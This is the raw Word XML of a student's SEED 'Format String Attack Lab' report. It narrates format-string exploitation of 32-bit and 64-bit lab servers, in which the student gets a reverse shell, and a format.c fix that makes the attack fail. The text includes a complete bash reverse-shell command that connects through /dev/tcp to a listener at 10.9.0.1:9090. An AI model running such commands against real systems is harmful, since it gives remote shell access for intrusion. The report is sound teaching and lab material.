          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C7714E0" wp14:editId="4B6A88AC">
            <wp:extent cx="5731510" cy="1862455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C7136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C7136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>And the desired result of malicious code being executed has been achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7136F" w:rsidRDefault="00C7136F" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00C7136F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60ADE349" wp14:editId="2ED45FFC">
            <wp:extent cx="5667154" cy="1488558"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="1651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t="-1" r="752" b="9396"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669104" cy="1489070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" lastClr="FFFFFF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01CDA" w:rsidRDefault="00D01CDA" w:rsidP="00C4310E">
      <w:r>
        <w:t xml:space="preserve">Modifying the above code in 32 bit shellcode by placing the command to be executed as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/bin/bash-c*/bin/bash –I &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="007A58C0">
        <w:t>. After modification sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A58C0" w:rsidRDefault="007A58C0" w:rsidP="00C4310E">
      <w:r w:rsidRPr="007A58C0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C93CA1" wp14:editId="027D0A8B">
            <wp:extent cx="5731510" cy="485140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67DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r>
        <w:t>Initiated listening process to get the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r w:rsidRPr="009167DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B784A4" wp14:editId="2C68677D">
            <wp:extent cx="5731510" cy="74993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8C0" w:rsidRDefault="007A58C0" w:rsidP="00C4310E">
      <w:r>
        <w:t>Server displays the following result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A58C0" w:rsidRDefault="007A58C0" w:rsidP="00C4310E">
      <w:r w:rsidRPr="007A58C0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B139F9B" wp14:editId="753F2357">
            <wp:extent cx="5731510" cy="984885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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8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67DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r>
        <w:t>Now coming back to the listener the connection is established and a reverse shell is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r w:rsidRPr="009167DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BA0C45A" wp14:editId="7D1DBD94">
            <wp:extent cx="4248743" cy="1781424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248743" cy="1781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67DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E"/>
    <w:p w:rsidR="009167DE" w:rsidRPr="007A58C0" w:rsidRDefault="009167DE" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc132474993"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r>
        <w:t>Testing the 64 bit server program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r w:rsidRPr="009167DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B09BDD8" wp14:editId="44B38ACF">
            <wp:extent cx="5731510" cy="31305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67DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r>
        <w:t>Which has been successfully received</w:t>
      </w:r>
      <w:r w:rsidR="003402AE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167DE" w:rsidRDefault="009167DE" w:rsidP="00C4310E">
      <w:r w:rsidRPr="009167DE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DC430DF" wp14:editId="6E23233F">
            <wp:extent cx="5731510" cy="3347085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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02AE" w:rsidRDefault="003402AE" w:rsidP="00C4310E">
      <w:r>
        <w:t xml:space="preserve">Now with the same method as in Task 2A </w:t>
      </w:r>
      <w:r w:rsidR="00B80A60">
        <w:t>I found the starting position of the input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B80A60" w:rsidRDefault="00B80A60" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00B80A60">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA7720A" wp14:editId="57473D97">
            <wp:extent cx="5731510" cy="2166620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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0A60" w:rsidRDefault="00482962" w:rsidP="00C4310E">
      <w:r>
        <w:t>Where this is the result point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B80A60" w:rsidRDefault="00B80A60" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00B80A60">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE4CD87" wp14:editId="324F9904">
            <wp:extent cx="5731510" cy="595630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3B55" w:rsidRDefault="002F3B55" w:rsidP="00C4310E"/>
    <w:p w:rsidR="002F3B55" w:rsidRDefault="002F3B55" w:rsidP="00C4310E"/>
    <w:p w:rsidR="002F3B55" w:rsidRDefault="002F3B55" w:rsidP="00C4310E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now modifying the exploit code</w:t>
      </w:r>
      <w:r w:rsidR="000B23BE">
        <w:t xml:space="preserve"> used in the previous task</w:t>
      </w:r>
      <w:r w:rsidR="0020519A">
        <w:t xml:space="preserve"> by also adding string parameters accordingly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to get the attack done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F3B55" w:rsidRDefault="002F3B55" w:rsidP="00C4310E">
      <w:r w:rsidRPr="002F3B55">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2756BD1E" wp14:editId="6DAA0300">
            <wp:extent cx="5731510" cy="3750310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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5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6865" w:rsidRDefault="00026865" w:rsidP="00C4310E"/>
    <w:p w:rsidR="0013711C" w:rsidRDefault="00D853DF" w:rsidP="00C4310E">
      <w:r>
        <w:t>Starting the listener to get the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013711C" w:rsidRDefault="000C7151" w:rsidP="00C4310E">
      <w:r w:rsidRPr="000C7151">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22A0BA7A" wp14:editId="7D968119">
            <wp:extent cx="5731510" cy="443230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711C" w:rsidRDefault="0013711C" w:rsidP="00C4310E">
      <w:r>
        <w:t>Sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013711C" w:rsidRDefault="0013711C" w:rsidP="00C4310E">
      <w:r w:rsidRPr="0013711C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E082F0" wp14:editId="616DE1E8">
            <wp:extent cx="5731510" cy="496570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7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E"/>
    <w:p w:rsidR="0013711C" w:rsidRDefault="0013711C" w:rsidP="00C4310E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Server side looks like this</w:t>
      </w:r>
      <w:r w:rsidR="000C7151">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7151" w:rsidRDefault="000C7151" w:rsidP="00C4310E">
      <w:r w:rsidRPr="000C7151">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429FB46E" wp14:editId="7D75A901">
            <wp:extent cx="5731510" cy="4387215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8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C78" w:rsidRDefault="001F0C78" w:rsidP="00C4310E">
      <w:r>
        <w:t>Coming back to the listener I got a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7EE0" w:rsidRDefault="002B7EE0" w:rsidP="00C4310E">
      <w:r w:rsidRPr="002B7EE0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16C8F1FA" wp14:editId="6FEBEE97">
            <wp:extent cx="5731510" cy="1459865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00C4310E"/>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc132474994"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00FE724C">
      <w:r>
        <w:t xml:space="preserve">To fix the issues I went to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE724C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>server-code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory and modified the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE724C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>format.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00FE724C">
      <w:r w:rsidRPr="00FE724C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05DD1EA4" wp14:editId="274EEBAD">
            <wp:extent cx="5731510" cy="5287010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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8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724C" w:rsidRDefault="00FE724C" w:rsidP="00FE724C">
      <w:r>
        <w:t>Compiling the code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE724C" w:rsidRDefault="00FE724C" w:rsidP="00FE724C">
      <w:r w:rsidRPr="00FE724C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7410D124" wp14:editId="1222A7C2">
            <wp:extent cx="5731510" cy="1358900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5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31B" w:rsidRDefault="008A631B" w:rsidP="00FE724C"/>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C"/>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C"/>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C"/>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Starting the servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C">
      <w:r w:rsidRPr="008A631B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09F2856D" wp14:editId="5A709DDE">
            <wp:extent cx="5696745" cy="1105054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96745" cy="1105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31B" w:rsidRDefault="008A631B" w:rsidP="00FE724C">
      <w:r>
        <w:t>Now with the configurations done for 32 bit program reverse shell attack I launched the attack by sending the script to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A631B" w:rsidRDefault="008A631B" w:rsidP="00FE724C">
      <w:r w:rsidRPr="008A631B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1191AF89" wp14:editId="6FE19B32">
            <wp:extent cx="5731510" cy="526415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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0B72" w:rsidRDefault="00410B72" w:rsidP="00FE724C">
      <w:r>
        <w:t>And the attack failed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00410B72" w:rsidRPr="00FE724C" w:rsidRDefault="00410B72" w:rsidP="00FE724C">
      <w:r w:rsidRPr="00410B72">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE4921E" wp14:editId="27615555">
            <wp:extent cx="5731510" cy="3641090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4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10B72" w:rsidRPr="00FE724C" w:rsidSect="00C4310E">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgNumType w:start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57DC8"/>
    <w:rsid w:val="00026865"/>
    <w:rsid w:val="0005084B"/>
    <w:rsid w:val="000B23BE"/>
    <w:rsid w:val="000C7151"/>
    <w:rsid w:val="0013711C"/>
    <w:rsid w:val="001A6953"/>
    <w:rsid w:val="001C2008"/>
    <w:rsid w:val="001C453E"/>
    <w:rsid w:val="001D55BB"/>
    <w:rsid w:val="001F0C78"/>
    <w:rsid w:val="00202891"/>
    <w:rsid w:val="00204579"/>
    <w:rsid w:val="0020519A"/>
    <w:rsid w:val="00252FDF"/>
    <w:rsid w:val="002B7EE0"/>
    <w:rsid w:val="002F3B55"/>
    <w:rsid w:val="003402AE"/>
    <w:rsid w:val="00367B30"/>
    <w:rsid w:val="003A4886"/>
    <w:rsid w:val="003D171B"/>
    <w:rsid w:val="00410B72"/>
    <w:rsid w:val="00482962"/>
    <w:rsid w:val="005A63B5"/>
    <w:rsid w:val="006B292B"/>
    <w:rsid w:val="006D676C"/>
    <w:rsid w:val="007225C0"/>
    <w:rsid w:val="007A58C0"/>
    <w:rsid w:val="00844E40"/>
    <w:rsid w:val="00857DC8"/>
    <w:rsid w:val="0087148D"/>
    <w:rsid w:val="008A631B"/>
    <w:rsid w:val="008E609F"/>
    <w:rsid w:val="00906793"/>
    <w:rsid w:val="009167DE"/>
    <w:rsid w:val="009621AB"/>
    <w:rsid w:val="00997F33"/>
    <w:rsid w:val="009F645D"/>
    <w:rsid w:val="00B80A60"/>
    <w:rsid w:val="00BB4844"/>
    <w:rsid w:val="00BD6AA1"/>
    <w:rsid w:val="00C4310E"/>
    <w:rsid w:val="00C7136F"/>
    <w:rsid w:val="00D01CDA"/>
    <w:rsid w:val="00D853DF"/>
    <w:rsid w:val="00DA3BD6"/>
    <w:rsid w:val="00DA677C"/>
    <w:rsid w:val="00DE29F3"/>
    <w:rsid w:val="00E81F5F"/>
    <w:rsid w:val="00F36FE8"/>
    <w:rsid w:val="00F62C6C"/>
    <w:rsid w:val="00FA722A"/>
    <w:rsid w:val="00FC4383"/>
    <w:rsid w:val="00FE724C"/>
    <w:rsid w:val="00FF15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12A3944D-ADD4-4936-9C20-276DA17CF8D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4310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A63B5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C4310E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia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C4310E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C4310E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C4310E"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005A63B5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NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E81F5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006B292B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6B292B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6B292B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9645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18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502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604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541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964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820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062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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2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2023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409C432F-F707-4147-A2FB-11CDEEADF05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626</TotalTime>
  <Pages>1</Pages>
  <Words>768</Words>
  <Characters>4378</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>36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Format String Attack Lab</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5136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Format String Attack Lab</dc:title>
  <dc:subject>SEED 2.0</dc:subject>
  <dc:creator>Enter your name</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Touseef Hasnain</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <cp:lastPrinted>2023-04-15T23:24:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-15T02:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-15T23:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>